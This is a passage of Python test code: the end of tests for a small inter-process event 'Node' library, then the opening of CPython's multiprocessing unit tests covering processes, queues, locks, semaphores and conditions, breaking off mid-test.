nt.assert_true(n.is_server())
time.sleep(0.2)
n.send('event', arg=2)
time.sleep(0.2)
nt.assert_equal(S.value, 2)
n.stop()
p.terminate()
def test_stop_start():
n = Node()
n.start_server()
n.stop()
n.start_server()
def test_delete():
n = Node()
n.send('test')
n2 = Node()
n2.send('test')
nt.assert_true(n.is_server())
nt.assert_false(n2.is_server())
del n
n3 = Node()
n3.send('test')
nt.assert_true(n3.is_server())
def test_restart():
n = Node()
n.send('test')
n2 = Node()
n2.send('test')
# n2.send('test')
def test_wait_for():
n = Node()
n.start_server()
p = Process(target=send_fn, kwargs={'arg1': 'value'})
time.sleep(0.1)
p.start()
args, kargs = n.wait_for('event', timeout=1)
nt.assert_equal(kargs['arg1'], 'value')
nt.assert_equal(args, ())
p.terminate()
def test_wait_for_timeout():
n = Node()
n.start_server()
#
args, kargs = n.wait_for('event', timeout=1)
nt.assert_equal(args, None)
nt.assert_equal(kargs, None)
def test_wait_with_send():
n = Node()
n.try_start()
time.sleep(0.5)
args, kargs = n.wait_for('test_event', timeout=2, send={'signal': 'test_event', 'value': 1})
nt.assert_equal(kargs['value'], 1)
def test_configure():
n = Node()
n.try_start()
time.sleep(1)
n.configure(server=False)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
